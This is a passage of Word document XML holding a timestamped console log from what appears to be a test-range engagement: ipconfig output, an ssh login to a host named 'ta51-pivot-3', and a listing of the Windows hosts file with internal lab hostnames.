    </w:p>
    <w:p w14:paraId="511F167B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Connection-specific DNS Suffix  . : corp.bovia.com                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE5450" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Link-local IPv6 Address . . . . . : fe80::b973:cf24:97bb:b6a4%3                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE53C8F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   IPv4 Address. . . . . . . . . . . : 128.55.12.109                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3750F5F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Subnet Mask . . . . . . . . . . . : 255.255.255.0                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8F187" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Default Gateway . . . . . . . . . : 128.55.12.1       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645697FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6911BDD8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ACE7C0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@TA1-FIVEDIRECTI C:\Users\admin&gt;ssh admin@128.55.12.234q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C439A40" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ssh: Could not resolve hostname 128.55.12.234q: No such host is known.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5881597F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75534B94" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178762EE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@TA1-FIVEDIRECTI C:\Users\admin&gt;ssh admin@128.55.12.234                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEB092C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The authenticity of host '128.55.12.234 (128.55.12.234)' can't be established.                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CBA61E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ECDSA key fingerprint is SHA256:6qW6FPKKVR3kTwXyaRgJJlkboXM/5M4QGC5ha+bnz+A.                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB08B2A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Are you sure you want to continue connecting (yes/no)? yes                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D7A1ED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Warning: Permanently added '128.55.12.234' (ECDSA) to the list of known hosts.                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436BC881" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.234's password:                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F7DAAD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-48-generic x86_64)                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778CE235" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72CEF068" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9A804" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Management:     https://landscape.canonical.com                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DF5A07" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Support:        https://ubuntu.com/advantage                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D7756" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6628124E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System information as of Fri May 10 18:59:34 UTC 2019                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A53221D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52507BF7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System load:  0.0                Processes:           85                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B08CDE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Usage of /:   3.5% of 125.49GB   Users logged in:     0                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34190E32" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Memory usage: 12%                IP address for ens3: 10.0.6.184                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40425D38" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Swap usage:   0%                 IP address for ens4: 128.55.12.234                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFF0B01" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F560126" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Ubuntu's Kubernetes 1.14 distributions can bypass Docker and use containerd                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176FC33" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   directly, see https://bit.ly/ubuntu-containerd or try it now with                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB611DC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD7FCE3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     snap install microk8s --classic                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D73BF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E33B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Canonical Livepatch is available for installation.                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B2B856" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Reduce system reboots and improve kernel security. Activate at:                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1356B8AD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     https://ubuntu.com/livepatch                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F77B06" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3137552B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">133 packages can be updated.                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CB311C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0 updates are security updates.                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3827C006" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FE74E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D734BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">*** System restart required ***                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060EC4FA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Last login: Thu Apr 25 17:43:10 2019                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA75287" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta51-pivot-3:~$           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51160F96" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5660C1C9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F7231F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta51-pivot-3:~$ exit                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0B33B5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">logout                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB5941" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection to 128.55.12.234 closed.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382BFCCA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8D93B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7467E3FC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@TA1-FIVEDIRECTI C:\Users\admin&gt;cd C:\Windows\system32\drivers\etc                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A22FF5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7916BC1E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@TA1-FIVEDIRECTI C:\Windows\System32\drivers\etc&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783BBD3C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D7AE32" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B427055" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@TA1-FIVEDIRECTI C:\Windows\System32\drivers\etc&gt;type hosts                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC413F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># Copyright (c) 1993-2009 Microsoft Corp.                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BFFBF4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A31B965" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># This is a sample HOSTS file used by Microsoft TCP/IP for Windows.                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A25E43" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500712DF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># This file contains the mappings of IP addresses to host names. Each                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6BC962" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># entry should be kept on an individual line. The IP address should                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54197C4F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># be placed in the first column followed by the corresponding host name.                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C2B604" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># The IP address and the host name should be separated by at least one                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CDB70E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># space.                                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F47AD1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C185899" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># Additionally, comments (such as these) may be inserted on individual                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0BDA04" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># lines or following the machine name denoted by a '#' symbol.                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB7D625" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099F2BAD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># For example:                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B4458" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A59BC28" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#      102.54.94.97     rhino.acme.com          # source server                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9442B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#       38.25.63.10     x.acme.com              # x client host                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D04DCF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># localhost name resolution is handled within DNS itself.                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345C42F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#       127.0.0.1       localhost                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76840B93" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#       ::1             localhost                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BCF1B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">127.0.0.1               ta1-fivedirections-1 ta1-fivedirections-3                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65913E0F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.58            ta1-fivedirections-translate-1-dp                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1006C415" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.160           ta1-fivedirections-translate-2-dp                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D0C0E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.52            ta3-test-dp ta3-perf-1-dp                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4584B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.73            ta3-prometheus-1-dp                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681BFB9A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.74            ta3-prometheus-2-dp                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1490324B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.59            ta3-starc-1-dp kafka-1                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE61792" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.60            ta3-starc-2-dp kafka-2                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6823424F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.61            ta3-starc-3-dp kafka-3                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3BDB9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.62            ta3-starc-4-dp kafka-4                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298220B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.63            ta3-starc-5-dp kafka-5                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002D393D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.64            ta3-starc-6-dp kafka-6                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F99434" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
